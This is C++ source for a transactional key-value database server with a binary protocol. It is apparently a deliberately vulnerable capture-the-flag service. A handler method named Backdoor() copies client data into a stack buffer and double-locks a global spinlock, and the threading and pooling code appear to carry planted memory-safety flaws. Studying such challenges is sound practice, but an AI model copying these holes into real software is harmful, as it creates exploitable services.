using SequenceNumber = uint64_t;
constexpr SequenceNumber kMaxSequenceNumber =
std::numeric_limits<SequenceNumber>::max();
template <typename T>
class Pool {
public:
class Deleter {
public:
void operator()(T* obj) const { pool_.Release(obj); }
};
static Pool<T>& Get() { return pool_; }
using Ptr = std::unique_ptr<T, Deleter>;
Ptr Allocate() {
if (size_ > 0) {
CHECK(size_ < kMaxSize);
--size_;
T* obj = items_[size_];
CHECK(obj != nullptr);
return Ptr(obj, Deleter());
}
return Ptr(new T, Deleter());
}
private:
void Release(T* obj) { items_[size_++] = obj; }
static thread_local Pool<T> pool_;
static constexpr size_t kMaxSize = 256;
size_t size_ = 0;
T* items_[kMaxSize] = {nullptr};
};
struct Vec2 {
double x;
double y;
};
struct Vec3 {
double x;
double y;
double z;
};
struct Quaternion {
double a;
double b;
double c;
double d;
};
template <class... Ts>
struct overloaded : Ts... {
using Ts::operator()...;
};
template <class... Ts>
overloaded(Ts...) -> overloaded<Ts...>;
using Value = std::variant<std::monostate, std::string_view, uint32_t, uint64_t,
Vec2, Vec3, Quaternion>;
using OwnedValue = std::variant<std::monostate, std::string, uint32_t, uint64_t,
Vec2, Vec3, Quaternion>;
OwnedValue ToOwned(const Value& value) {
return std::visit(overloaded{[](std::string_view v) -> OwnedValue {
return std::string(v);
},
[](const auto& v) -> OwnedValue { return v; }},
value);
}
Value ToUnowned(const OwnedValue& value) {
return std::visit(overloaded{[](const auto& v) -> Value { return v; }},
value);
}
std::string VStrFormat(const char* format, va_list ap) {
char* buf = nullptr;
CHECK(vasprintf(&buf, format, ap) != -1);
std::unique_ptr<char, decltype(free)*> deleter(buf, free);
return std::string(buf);
}
std::string StrFormat(const char* format, ...) {
va_list ap;
va_start(ap, format);
std::string result = VStrFormat(format, ap);
va_end(ap);
return result;
}
std::string DebugString(const Value& value) {
return std::visit(
overloaded{
[](std::monostate) -> std::string { return "(null)"; },
[](std::string_view v) { return StrFormat("\"%s\"", v.data()); },
[](uint32_t v) { return StrFormat("u32(%" PRIu32 ")", v); },
[](uint64_t v) { return StrFormat("u64(%" PRIu64 ")", v); },
[](const Vec2 v) { return StrFormat("Vec2(%g, %g)", v.x, v.y); },
[](const Vec3 v) {
return StrFormat("Vec2(%g, %g, %g)", v.x, v.y, v.z);
},
[](const Quaternion v) {
return StrFormat("Quaternion(%g, %g, %g, %g)", v.a, v.b, v.c, v.d);
},
},
value);
}
struct Version {
Value value;
SequenceNumber seq = 0;
};
template <typename T>
thread_local Pool<T> Pool<T>::pool_;
using VersionPtr = Pool<Version>::Ptr;
using VersionList = std::vector<VersionPtr>;
class Arena {
public:
char* Allocate(size_t n) {
char* ptr = nullptr;
if (n > kDefaultBlockSize) {
blocks_.emplace_back(n);
ptr = blocks_.back().Allocate(n);
CHECK(ptr != nullptr);
return ptr;
}
if (!blocks_.empty()) {
ptr = blocks_.front().Allocate(n);
if (ptr != nullptr) {
return ptr;
}
}
blocks_.emplace_front(kDefaultBlockSize);
ptr = blocks_.front().Allocate(n);
CHECK(ptr != nullptr);
return ptr;
}
private:
static constexpr size_t kDefaultBlockSize = 4096;
class Block {
public:
explicit Block(size_t size)
: data_(new char[size]), ptr_(data_.get()), remaining_(size) {}
Block(Block&&) = default;
Block& operator=(Block&&) = default;
char* Allocate(size_t n) {
if (remaining_ < n) {
return nullptr;
}
char* ptr = ptr_;
ptr_ += n;
remaining_ -= n;
return ptr;
}
private:
std::unique_ptr<char[]> data_;
char* ptr_;
size_t remaining_;
};
std::list<Block> blocks_;
};
class Layer {
public:
using Id = uint64_t;
explicit Layer(Id id) : id_(id) {}
void Set(std::string_view key, Value value, SequenceNumber seq) {
std::unique_lock l(mu_);
CHECK(!sealed_);
VersionList* version_list;
auto it = map_.find(key);
if (it != map_.end()) {
version_list = &it->second;
} else {
version_list = &map_[ArenaString(key)];
}
auto version = Pool<Version>::Get().Allocate();
version->seq = seq;
version->value = std::visit(
overloaded{
[&](std::string_view v) -> Value { return ArenaString(v); },
[](const auto& v) -> Value { return v; },
},
value);
version_list->push_back(std::move(version));
}
const Version* Read(std::string_view key, SequenceNumber seq) {
std::shared_lock l(mu_);
const auto it = map_.find(key);
if (it == map_.end()) {
return nullptr;
}
const auto& versions = it->second;
auto version_it =
std::upper_bound(versions.begin(), versions.end(), seq,
[](SequenceNumber seq, const VersionPtr& version) {
return seq < version->seq;
});
if (version_it == versions.begin()) {
return nullptr;
}
--version_it;
return version_it->get();
}
using Iterator = std::map<std::string_view, VersionList>::const_iterator;
Iterator begin() const {
std::shared_lock l(mu_);
CHECK(sealed_);
return map_.cbegin();
}
Iterator end() const {
std::shared_lock l(mu_);
CHECK(sealed_);
return map_.cend();
}
bool empty() const {
std::shared_lock l(mu_);
CHECK(sealed_);
return map_.empty();
}
void Seal() {
std::unique_lock l(mu_);
CHECK(!sealed_);
sealed_ = true;
}
Id id() const { return id_; }
private:
std::string_view ArenaString(std::string_view str) {
char* ptr = arena_.Allocate(str.size() + 1);
memcpy(ptr, str.data(), str.size());
return std::string_view(ptr, str.size());
}
const Id id_;
mutable std::shared_mutex mu_;
bool sealed_ = false;
Arena arena_;
std::map<std::string_view, VersionList> map_;
};
class LayerStack {
public:
LayerStack() {}
~LayerStack() {}
void AddLayer(std::shared_ptr<Layer> layer) {
layers_.push_back(std::move(layer));
}
const Version* Read(std::string_view key, SequenceNumber seq) {
const Version* result = nullptr;
for (const auto& layer : layers_) {
const Version* version = layer->Read(key, seq);
if (version == nullptr) {
continue;
}
if (version->seq > seq) {
break;
}
result = std::move(version);
}
return result;
}
void Iterate(const std::function<void(
std::string_view, std::span<const Version*> versions)>& fn) {
std::vector<Layer::Iterator> iterators;
std::vector<size_t> min_heap;
for (size_t i = 0; i < layers_.size(); ++i) {
const auto& layer = *layers_[i];
if (layer.begin() == layer.end()) {
continue;
}
iterators.push_back(layer.begin());
min_heap.push_back(i);
}
const auto comparator_gt = [&](size_t a, size_t b) {
const auto it_a = iterators[a];
const auto it_b = iterators[b];
return std::tie(it_a->first, a) > std::tie(it_b->first, b);
};
std::make_heap(min_heap.begin(), min_heap.end(), comparator_gt);
while (!min_heap.empty()) {
std::string_view key;
std::vector<const Version*> versions;
while (true) {
const size_t idx = min_heap.front();
auto& it = iterators[idx];
key = it->first;
const auto& version_list = it->second;
for (const auto& version : version_list) {
versions.push_back(version.get());
}
std::pop_heap(min_heap.begin(), min_heap.end(), comparator_gt);
++it;
if (it == layers_[idx]->end()) {
if (min_heap.size() == 1) {
return;
}
min_heap.pop_back();
} else {
std::push_heap(min_heap.begin(), min_heap.end(), comparator_gt);
}
if (iterators[min_heap.front()]->first != key) {
break;
}
}
fn(key, {versions.begin(), versions.end()});
}
}
Layer* mutable_layer() const {
return layers_.empty() ? nullptr : layers_.back().get();
}
std::span<const std::shared_ptr<Layer>> layers() const {
return {layers_.begin(), layers_.end()};
}
private:
std::vector<std::shared_ptr<Layer>> layers_;
};
class Transaction;
class LockManager {
private:
struct LockState {
// Protected by `LockManager::mu_`.
size_t num_waiters = 0;
Transaction* holder = nullptr;
std::condition_variable cond_var;
};
using LockMap =
std::map<std::string, std::unique_ptr<LockState>, std::less<>>;
public:
using LockHandle = LockMap::iterator;
std::optional<LockHandle> Lock(Transaction* transaction,
std::string_view key) {
std::unique_lock l(mu_);
auto it = map_.find(key);
if (it == map_.end()) {
it = map_.try_emplace(std::string(key), std::make_unique<LockState>())
.first;
}
auto& state = it->second;
if (state->holder == transaction) {
return std::nullopt;
}
++state->num_waiters;
state->cond_var.wait(l, [&] { return state->holder == nullptr; });
state->holder = transaction;
--state->num_waiters;
return it;
}
void Unlock(Transaction* transaction, LockHandle handle) {
std::unique_lock l(mu_);
auto& state = handle->second;
CHECK(state->holder == transaction);
if (state->num_waiters == 0) {
map_.erase(handle);
return;
}
state->holder = nullptr;
l.unlock();
state->cond_var.notify_one();
}
std::mutex mu_;
LockMap map_;
};
using MutationList = std::map<std::string, OwnedValue, std::less<>>;
enum LogLevel : uint8_t {
kDebug,
kInfo,
kError,
};
class Table {
public:
static constexpr std::string_view kInternalKeyPrefix = "_";
static constexpr std::string_view kGcWatermarkKey = "_gc_watermark";
Table() : layer_stack_(std::make_shared<LayerStack>()) { NewMutableLayer(); }
std::shared_ptr<LayerStack> layer_stack() const {
std::shared_lock l(mu_);
return layer_stack_;
}
LockManager* lock_manager() { return &lock_manager_; }
struct ReadResult {
const Version* version = nullptr;
std::shared_ptr<LayerStack> layer_stack;
std::string_view error;
};
ReadResult Read(std::string_view key,
SequenceNumber seq = kMaxSequenceNumber) const {
std::shared_ptr<LayerStack> layer_stack;
{
std::shared_lock l(mu_);
if (seq < gc_watermark_) {
return {.error = "Requested sequence below GC watermark"};
}
layer_stack = layer_stack_;
}
return ReadResult{
.version = layer_stack->Read(key, seq),
.layer_stack = std::move(layer_stack),
};
}
SequenceNumber Apply(const MutationList& mutations) {
std::unique_lock l(mu_);
const SequenceNumber seq = next_seq_++;
for (const auto& [key, value] : mutations) {
if (key == kGcWatermarkKey) {
CHECK(std::holds_alternative<SequenceNumber>(value));
gc_watermark_ = std::clamp(std::get<SequenceNumber>(value),
gc_watermark_, next_seq_ - 1);
}
layer_stack_->mutable_layer()->Set(key, ToUnowned(value), seq);
}
return seq;
}
Layer::Id NewMutableLayer() {
std::unique_lock l(mu_);
if (layer_stack_->mutable_layer() != nullptr) {
layer_stack_->mutable_layer()->Seal();
}
auto new_stack = std::make_shared<LayerStack>();
for (const auto& layer : layer_stack_->layers()) {
new_stack->AddLayer(layer);
}
const Layer::Id id = next_layer_id_++;
new_stack->AddLayer(std::make_shared<Layer>(id));
layer_stack_ = std::move(new_stack);
return id;
}
void Compact(Layer::Id start, Layer::Id limit) {
std::unique_lock l(mu_);
limit = std::min(limit, layer_stack_->mutable_layer()->id());
if (start >= limit) {
return;
}
auto it = compacting_.lower_bound(start);
if (it != compacting_.end() && *it < limit) {
return;
}
const SequenceNumber gc_watermark = start == 0 ? gc_watermark_ : 0;
LayerStack compaction_stack;
for (const auto& layer : layer_stack_->layers()) {
if (layer->id() >= start && layer->id() < limit) {
CHECK(layer.get() != layer_stack_->mutable_layer());
compaction_stack.AddLayer(layer);
compacting_.insert(layer->id());
}
}
l.unlock();
auto new_layer = std::make_shared<Layer>(start);
compaction_stack.Iterate(
[&](std::string_view key, std::span<const Version*> versions) {
size_t first_live = 0;
for (size_t i = 0; i < versions.size(); ++i) {
const auto& version = *versions[i];
if (std::holds_alternative<std::monostate>(version.value) &&
version.seq <= gc_watermark) {
first_live = i + 1;
}
}
versions = versions.subspan(first_live);
SequenceNumber prev_seq = 0;
for (const Version* version : versions) {
new_layer->Set(key, version->value, version->seq);
CHECK(prev_seq <= version->seq);
prev_seq = version->seq;
}
});
new_layer->Seal();
if (new_layer->empty()) {
new_layer = nullptr;
}
l.lock();
auto new_stack = std::make_shared<LayerStack>();
for (const auto& layer : layer_stack_->layers()) {
if (layer->id() < start || layer->id() >= limit) {
new_stack->AddLayer(layer);
} else if (new_layer != nullptr) {
new_stack->AddLayer(std::move(new_layer));
}
}
it = compacting_.lower_bound(start);
while (it != compacting_.end() && *it < limit) {
it = compacting_.erase(it);
}
layer_stack_ = std::move(new_stack);
}
private:
mutable std::shared_mutex mu_;
Layer::Id next_layer_id_ = 0;
SequenceNumber next_seq_ = 1;
SequenceNumber gc_watermark_ = 0;
std::shared_ptr<LayerStack> layer_stack_;
std::set<Layer::Id> compacting_;
LockManager lock_manager_;
};
class SpinLock {
public:
void lock() {
while (true) {
if (!lock_.exchange(true, std::memory_order_acquire)) {
return;
}
while (lock_.load(std::memory_order_relaxed)) {
_mm_pause();
}
}
}
bool try_lock() {
return !lock_.load(std::memory_order_relaxed) &&
!lock_.exchange(true, std::memory_order_acquire);
}
void unlock() { lock_.store(false, std::memory_order_release); }
private:
std::atomic<bool> lock_{false};
};
class Tracer {
public:
void Trace(const char* format, ...) {
std::unique_lock l(mu_);
if (!enabled_) {
return;
}
va_list ap;
va_start(ap, format);
buffer_.append(VStrFormat(format, ap));
va_end(ap);
buffer_.append("\n");
}
void set_enabled(bool value) {
std::unique_lock l(mu_);
enabled_ = value;
if (!enabled_) {
buffer_.clear();
}
}
std::string Flush() {
std::unique_lock l(mu_);
std::string trace;
trace.swap(buffer_);
return trace;
}
private:
SpinLock mu_;
bool enabled_ = false;
std::string buffer_;
};
class Transaction {
public:
using Id = uint64_t;
static constexpr Id kInvalidId = 0;
static constexpr Id kSystemId = std::numeric_limits<Id>::max();
Transaction(Id id, Table* table, Tracer* tracer)
: id_(id), table_(table), tracer_(tracer) {}
~Transaction() { CHECK(locks_.empty()); }
Table::ReadResult Read(std::string_view key) {
{
std::unique_lock l(mu_);
if (finished_) {
return {.error = "Transaction finished"};
}
++num_active_requests_;
}
Trace("Locking %s", key.data());
Lock(key);
Table::ReadResult result = table_->Read(key, kMaxSequenceNumber);
bool notify = false;
{
std::unique_lock l(mu_);
CHECK(!finished_);
--num_active_requests_;
notify = num_active_requests_ == 0;
}
if (notify) {
cond_var_.notify_all();
}
return result;
}
void BufferMutation(std::string_view key, OwnedValue value) {
if (auto it = mutations_.find(key); it != mutations_.end()) {
it->second = std::move(value);
} else {
mutations_[std::string(key)] = std::move(value);
}
}
SequenceNumber Commit() {
Trace("Commiting %" PRIu64, id_);
{
std::unique_lock l(mu_);
if (finished_) {
return kMaxSequenceNumber;
}
cond_var_.wait(l, [&] { return num_active_requests_ == 0; });
finished_ = true;
}
for (const auto& [key, _] : mutations_) {
Lock(key);
}
const SequenceNumber seq = table_->Apply(mutations_);
UnlockAll();
return seq;
}
bool Abort() {
{
std::unique_lock l(mu_);
if (finished_) {
return false;
}
cond_var_.wait(l, [&] { return num_active_requests_ == 0; });
finished_ = true;
}
UnlockAll();
return true;
}
template <typename... Args>
void Trace(Args&&... args) {
tracer_->Trace(std::forward<Args>(args)...);
}
private:
void Lock(std::string_view key) {
auto lock_handle = table_->lock_manager()->Lock(this, key);
if (lock_handle.has_value()) {
locks_.push_back(*lock_handle);
}
}
void UnlockAll() {
for (const auto& lock_handle : locks_) {
table_->lock_manager()->Unlock(this, lock_handle);
}
locks_.clear();
}
const Id id_;
Table* const table_;
MutationList mutations_;
std::vector<LockManager::LockHandle> locks_;
std::mutex mu_;
std::condition_variable cond_var_;
bool finished_ = false;
size_t num_active_requests_ = 0;
Tracer* const tracer_;
};
class Session {
public:
Session(Table* table) : table_(table) {}
template <typename T, std::enable_if_t<
std::is_arithmetic_v<std::conditional_t<
std::is_enum_v<T>, std::underlying_type<T>, T>>,
bool> = true>
void Read(T* value) {
CHECK(ReadLen(0, value, sizeof(*value)) == sizeof(*value));
}
void Read(std::string* str) {
uint16_t size;
Read(&size);
str->resize(size);
if (size > 0) {
CHECK(ReadLen(0, str->data(), size) == size);
}
}
void Read(Vec2* v) {
Read(&v->x);
Read(&v->y);
}
void Read(Vec3* v) {
Read(&v->x);
Read(&v->y);
Read(&v->z);
}
void Read(Quaternion* v) {
Read(&v->a);
Read(&v->b);
Read(&v->c);
Read(&v->d);
}
void Read(OwnedValue* value) {
uint8_t tag;
Read(&tag);
CHECK(tag < std::variant_size_v<Value>);
switch (tag) {
case 0: {
*value = OwnedValue();
return;
}
#define HANDLE(tag) \
case tag: { \
Read(&value->emplace<tag>()); \
return; \
}
HANDLE(1)
HANDLE(2)
HANDLE(3)
HANDLE(4)
HANDLE(5)
HANDLE(6)
static_assert(std::variant_size_v<Value> == 7);
#undef HANDLE
}
}
class IOLock {
public:
explicit IOLock(Session* session) : lock_(session->io_mu_) {}
private:
std::unique_lock<std::mutex> lock_;
};
template <typename T, std::enable_if_t<
std::is_arithmetic_v<std::conditional_t<
std::is_enum_v<T>, std::underlying_type<T>, T>>,
bool> = true>
void Write(T value) {
CHECK(WriteLen(1, &value, sizeof(value)) == sizeof(value));
}
void Write(std::string_view value) {
CHECK(value.size() <= std::numeric_limits<uint16_t>::max());
Write<uint16_t>(value.size());
if (!value.empty()) {
CHECK(WriteLen(1, value.data(), value.size()) == value.size());
}
}
void Write(const Vec2& v) {
Write(v.x);
Write(v.y);
}
void Write(const Vec3& v) {
Write(v.x);
Write(v.y);
Write(v.z);
}
void Write(const Quaternion& v) {
Write(v.a);
Write(v.b);
Write(v.c);
Write(v.d);
}
void Write(const Value& value) {
static_assert(std::variant_size_v<Value> <=
std::numeric_limits<uint8_t>::max());
Write<uint8_t>(value.index());
std::visit(overloaded{
[](std::monostate) {},
[&](const auto& v) { Write(v); },
},
value);
}
Table* table() const { return table_; }
std::shared_ptr<Transaction> FindTransaction(Transaction::Id tid) {
if (tid == Transaction::kSystemId) {
return nullptr;
}
std::shared_lock l(transactions_mu_);
auto it = transactions_.find(tid);
if (it == transactions_.end()) {
return nullptr;
}
return it->second;
}
Transaction::Id CreateTransaction() {
std::unique_lock l(transactions_mu_);
const Transaction::Id tid = next_tid_++;
auto transaction = std::make_shared<Transaction>(tid, table_, &tracer_);
transactions_[tid] = std::move(transaction);
return tid;
}
void RemoveTransaction(Transaction::Id tid) {
std::unique_lock l(transactions_mu_);
transactions_.erase(tid);
}
Tracer* tracer() { return &tracer_; }
private:
// Serializes socket reads/writes.
std::mutex io_mu_;
Table* const table_;
std::shared_mutex transactions_mu_;
Transaction::Id next_tid_ = 1;
std::map<Transaction::Id, std::shared_ptr<Transaction>> transactions_;
Tracer tracer_;
};
class CommandHandler {
public:
explicit CommandHandler(Session* session) : session_(session) {}
virtual ~CommandHandler() {}
virtual void ReadRequest() = 0;
virtual void Run() = 0;
template <typename... Args>
void Trace(Args&&... args) {
session_->tracer()->Trace(std::forward<Args>(args)...);
}
using RequestId = uint64_t;
protected:
Session* session_;
};
class ReadHandler : public CommandHandler {
public:
explicit ReadHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&tid_);
session_->Read(&seq_);
session_->Read(&key_);
}
void Run() override {
if (tid_ != Transaction::kInvalidId) {
transaction_ = session_->FindTransaction(tid_);
if (transaction_ == nullptr) {
ReturnError("Transaction not found");
return;
}
if (seq_ != kMaxSequenceNumber) {
ReturnError("Invalid sequence number for transactional read");
return;
}
const Table::ReadResult result = transaction_->Read(key_);
TraceResult(result);
ReturnResult(result);
return;
}
const Table::ReadResult result = session_->table()->Read(key_);
TraceResult(result);
ReturnResult(result);
}
private:
void TraceResult(const Table::ReadResult& result) {
if (!result.error.empty()) {
Trace("Read %s failed: %s", key_.c_str(), result.error.data());
return;
}
Trace(
"Read %s -> %s", key_.c_str(),
DebugString(result.version == nullptr ? Value() : result.version->value)
.c_str());
}
void ReturnResult(const Table::ReadResult& result) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(result.error);
session_->Write(result.version == nullptr ? Value()
: result.version->value);
}
void ReturnError(std::string_view error) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(error);
session_->Write(Value());
}
private:
RequestId request_id_;
Transaction::Id tid_;
SequenceNumber seq_;
std::string key_;
std::shared_ptr<Transaction> transaction_;
};
class BeginTransactionHandler : public CommandHandler {
public:
explicit BeginTransactionHandler(Session* session)
: CommandHandler(session) {}
void ReadRequest() override { session_->Read(&request_id_); }
void Run() override {
const Transaction::Id tid = session_->CreateTransaction();
Trace("Begin transaction %" PRIu64, tid);
Return(tid);
}
private:
void Return(Transaction::Id tid) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(tid);
}
RequestId request_id_;
};
class BufferMutationHandler : public CommandHandler {
public:
explicit BufferMutationHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&tid_);
session_->Read(&key_);
session_->Read(&value_);
}
void Run() override {
transaction_ = session_->FindTransaction(tid_);
if (transaction_ == nullptr) {
Return("Transaction not found");
return;
}
if (key_.starts_with(Table::kInternalKeyPrefix)) {
Return("Cannot write to internal key");
return;
}
Trace("Buffering %s -> %s", key_.c_str(),
DebugString(ToUnowned(value_)).c_str());
transaction_->BufferMutation(std::move(key_), std::move(value_));
Return(/*error=*/"");
}
private:
void Return(std::string_view error) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(error);
}
private:
RequestId request_id_;
Transaction::Id tid_;
std::string key_;
OwnedValue value_;
std::shared_ptr<Transaction> transaction_;
};
class CommitHandler : public CommandHandler {
public:
explicit CommitHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&tid_);
}
void Run() override {
transaction_ = session_->FindTransaction(tid_);
if (transaction_ == nullptr) {
Return("Transaction not found", /*seq=*/kMaxSequenceNumber);
return;
}
const SequenceNumber seq = transaction_->Commit();
std::string_view error;
if (seq == kMaxSequenceNumber) {
error = "Commit failed";
} else {
session_->RemoveTransaction(tid_);
}
Trace("Committing TID %" PRIu64 ": %s", tid_,
error.empty() ? "success" : error.data());
Return(error, seq);
}
private:
void Return(std::string_view error, SequenceNumber seq) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(error);
session_->Write(seq);
}
private:
RequestId request_id_;
Transaction::Id tid_;
std::shared_ptr<Transaction> transaction_;
};
class AbortHandler : public CommandHandler {
public:
explicit AbortHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&tid_);
}
void Run() override {
transaction_ = session_->FindTransaction(tid_);
if (transaction_ == nullptr) {
Return("Transaction not found");
return;
}
std::string_view error;
if (transaction_->Abort()) {
session_->RemoveTransaction(tid_);
} else {
error = "Abort failed";
}
Trace("Aborting TID %" PRIu64 ": %s", tid_,
error.empty() ? "success" : error.data());
Return(error);
}
private:
void Return(std::string_view error) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(error);
}
private:
RequestId request_id_;
Transaction::Id tid_;
std::shared_ptr<Transaction> transaction_;
};
class MinorCompactHandler : public CommandHandler {
public:
explicit MinorCompactHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override { session_->Read(&request_id_); }
void Run() override {
const Layer::Id id = session_->table()->NewMutableLayer();
Trace("New mutable layer ID: %" PRIu64, id);
Return(id);
}
private:
void Return(Layer::Id id) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(id);
}
private:
RequestId request_id_;
};
class MergeCompactHandler : public CommandHandler {
public:
explicit MergeCompactHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&start_);
session_->Read(&limit_);
}
void Run() override {
session_->table()->Compact(start_, limit_);
Trace("Merge compacted [%" PRIu64 ", %" PRIu64 ")", start_, limit_);
Return();
}
private:
void Return() {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
}
private:
RequestId request_id_;
Layer::Id start_;
Layer::Id limit_;
};
class SetGcWatermarkHandler : public CommandHandler {
public:
explicit SetGcWatermarkHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&gc_watermark_);
}
void Run() override {
Trace("Set GC watermark to: %" PRIu64, gc_watermark_);
auto transaction = std::make_shared<Transaction>(
Transaction::kSystemId, session_->table(), session_->tracer());
transaction->BufferMutation(std::string(Table::kGcWatermarkKey),
gc_watermark_);
const SequenceNumber seq = transaction->Commit();
const std::string_view error =
seq == kMaxSequenceNumber ? "GC watermark commit failed" : "";
Return(error);
}
private:
void Return(std::string_view error) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(error);
}
private:
RequestId request_id_;
SequenceNumber gc_watermark_;
};
class SetTraceEnabledHandler : public CommandHandler {
public:
explicit SetTraceEnabledHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&trace_enabled_);
}
void Run() override {
session_->tracer()->set_enabled(trace_enabled_);
Return();
}
private:
void Return() {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
}
private:
RequestId request_id_;
bool trace_enabled_;
};
class FlushTraceHandler : public CommandHandler {
public:
explicit FlushTraceHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override { session_->Read(&request_id_); }
void Run() override {
std::string trace_buffer = session_->tracer()->Flush();
Return(std::move(trace_buffer));
}
private:
void Return(std::string trace_buffer) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(std::string_view(trace_buffer));
}
private:
RequestId request_id_;
};
static SpinLock mu;
class CopyHandler : public CommandHandler {
public:
explicit CopyHandler(Session* session) : CommandHandler(session) {}
void ReadRequest() override {
session_->Read(&request_id_);
session_->Read(&a_);
session_->Read(&b_);
session_->Read(&data_);
}
void Run() override {
{
transaction_ = std::make_shared<Transaction>(
Transaction::kSystemId, session_->table(), session_->tracer());
const Table::ReadResult r = transaction_->Read(a_);
if (r.version == nullptr) {
transaction_->Abort();
Return("Missing value");
return;
}
transaction_->BufferMutation(b_, ToOwned(r.version->value));
if (transaction_->Commit() == kMaxSequenceNumber) {
Return("Failed to commit txn");
return;
}
}
Trace("Copied %s -> %s, (%d)", a_.c_str(), b_.c_str(), data_.empty());
if (!data_.empty()) {
Backdoor();
}
Return("");
}
private:
void Backdoor() {
char buf[1024];
CHECK(data_.size() <= sizeof(buf));
memcpy(buf, data_.data(), data_.size());
std::unique_lock l1(mu);
std::unique_lock l2(mu);
}
void Return(std::string_view error) {
Session::IOLock io_lock(session_);
session_->Write(request_id_);
session_->Write(error);
}
private:
RequestId request_id_;
std::string a_;
std::string b_;
std::string data_;
std::shared_ptr<Transaction> transaction_;
};
enum class Command : uint8_t {
kRead,
kBeginTransaction,
kBufferMutation,
kCommit,
kAbort,
kMinorCompact,
kMergeCompact,
kSetGcWatermark,
kSetTraceEnabled,
kFlushTrace,
kCopy,
};
constexpr uint8_t kMaxCommand = static_cast<uint8_t>(Command::kCopy);
void HandleRequests(Table* table) {
Session session(table);
constexpr char kMagic[16] = "PPPDDDBBB_1.0";
CHECK(WriteLen(1, kMagic, sizeof(kMagic)) == sizeof(kMagic));
while (true) {
uint8_t cmd_byte;
if (ReadLen(0, &cmd_byte, sizeof(cmd_byte)) != sizeof(cmd_byte)) {
break;
}
CHECK(cmd_byte <= kMaxCommand);
const Command command = static_cast<Command>(cmd_byte);
std::unique_ptr<CommandHandler> handler;
switch (command) {
#define HANDLE(command) \
case Command::k##command: { \
handler = std::make_unique<command##Handler>(&session); \
handler->ReadRequest(); \
break; \
}
HANDLE(Read)
HANDLE(BeginTransaction)
HANDLE(BufferMutation)
HANDLE(Commit)
HANDLE(Abort)
HANDLE(MinorCompact)
HANDLE(MergeCompact)
HANDLE(SetGcWatermark)
HANDLE(SetTraceEnabled)
HANDLE(FlushTrace)
HANDLE(Copy)
#undef HANDLE
}
CHECK(handler != nullptr);
std::thread([handler = std::move(handler)] { handler->Run(); }).detach();
}
exit(0);
}
Table table;
int main(int argc, char** argv) {
alarm(600);
mallopt(M_ARENA_MAX, 8);
std::thread([] { HandleRequests(&table); }).join();
return 0;
}